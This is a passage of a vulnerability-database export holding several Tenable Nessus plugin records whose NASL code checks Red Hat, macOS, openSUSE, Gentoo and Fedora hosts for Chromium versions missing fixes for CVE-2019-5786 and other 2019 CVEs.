a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-5786\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0481\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-72.0.3626.121-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-72.0.3626.121-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", 
cpu:\"i686\", reference:\"chromium-browser-debuginfo-72.0.3626.121-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-72.0.3626.121-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T03:33:38", "description": "The version of Google Chrome installed on the remote macOS host is\nprior to 72.0.3626.121. It is, therefore, affected by a vulnerability\nas referenced in the 2019_03_stable-channel-update-for-desktop\nadvisory.\n\n - Use-after-free in FileReader. (CVE-2019-5786)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-06T00:00:00", "title": "Google Chrome < 72.0.3626.121 Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_72_0_3626_121.NASL", "href": "https://www.tenable.com/plugins/nessus/122616", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122616);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/31 15:18:51\");\n\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n\n script_name(english:\"Google Chrome < 72.0.3626.121 Vulnerability\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is\nprior to 72.0.3626.121. It is, therefore, affected by a vulnerability\nas referenced in the 2019_03_stable-channel-update-for-desktop\nadvisory.\n\n - Use-after-free in FileReader. (CVE-2019-5786)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df49025b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/936448\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 72.0.3626.121 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5786\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/01\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'72.0.3626.121', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:50:51", "description": "This update for chromium fixes the following issues :\n\nChromium was updated: to 72.0.3626.121 :\n\n - CVE-2019-5786: Use-after-free in FileReader fixed\n (boo#1127602)\n\n - Feature fixes update only", "edition": 11, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-08T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2019-298)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2019-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium-debuginfo"], "id": "OPENSUSE-2019-298.NASL", "href": "https://www.tenable.com/plugins/nessus/122714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update 
openSUSE-2019-298.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122714);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-5786\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-298)\");\n script_summary(english:\"Check for the openSUSE-2019-298 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated: to 72.0.3626.121 :\n\n - CVE-2019-5786: Use-after-free in FileReader fixed\n (boo#1127602)\n\n - Feature fixes update only\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1127602\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-72.0.3626.121-lp150.2.46.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-72.0.3626.121-lp150.2.46.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-72.0.3626.121-lp150.2.46.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-72.0.3626.121-lp150.2.46.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-72.0.3626.121-lp150.2.46.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T02:57:07", "description": "The remote host is affected by the 
vulnerability described in GLSA-201903-23\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n Please review the referenced CVE identifiers and Google Chrome Releases\n for details.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 16, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-28T00:00:00", "title": "GLSA-201903-23 : Chromium: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5803", "CVE-2019-5792", "CVE-2019-5801", "CVE-2019-5793", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5796", "CVE-2019-5791", "CVE-2019-5790", "CVE-2019-5794", "CVE-2019-5800", "CVE-2018-17479", "CVE-2019-5788", "CVE-2019-5787"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:chromium"], "id": "GENTOO_GLSA-201903-23.NASL", "href": "https://www.tenable.com/plugins/nessus/123429", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201903-23.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123429);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\"CVE-2018-17479\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\");\n script_xref(name:\"GLSA\", value:\"201903-23\");\n\n script_name(english:\"GLSA-201903-23 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201903-23\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. 
Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n Please review the referenced CVE identifiers and Google Chrome Releases\n for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201903-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-73.0.3683.75'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright 
(C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 73.0.3683.75\"), vulnerable:make_list(\"lt 73.0.3683.75\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:23:31", "description": "Update to 73.0.3683.75. 
Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-26T00:00:00", "title": "Fedora 29 : chromium (2019-561eae4626)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5766", "CVE-2019-5769", "CVE-2019-5758", "CVE-2019-5761", "CVE-2019-5767", "CVE-2019-5777", "CVE-2019-5772", "CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5763", "CVE-2019-5771", "CVE-2019-5803", "CVE-2019-5776", "CVE-2019-5764", "CVE-2019-5755", "CVE-2019-5792", "CVE-2019-5762", "CVE-2019-5757", "CVE-2019-5768", "CVE-2019-5754", "CVE-2019-5782", "CVE-2019-5801", "CVE-2019-5779", "CVE-2019-5756", "CVE-2019-5793", "CVE-2019-5770", "CVE-2019-5778", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5775", "CVE-2019-5773", "CVE-2019-5796", "CVE-2019-5780", "CVE-2019-5791", "CVE-2019-5784", "CVE-2019-5765", "CVE-2019-5781", "CVE-2019-5759", "CVE-2019-5790", "CVE-2019-5760", "CVE-2019-5794", "CVE-2019-5800", "CVE-2019-5788", 
"CVE-2019-5787", "CVE-2019-5774"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2019-561EAE4626.NASL", "href": "https://www.tenable.com/plugins/nessus/123100", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-561eae4626.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123100);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2020/02/03\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\");\n script_xref(name:\"FEDORA\", value:\"2019-561eae4626\");\n\n script_name(english:\"Fedora 29 : chromium (2019-561eae4626)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 73.0.3683.75. 
Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-561eae4626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5789\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 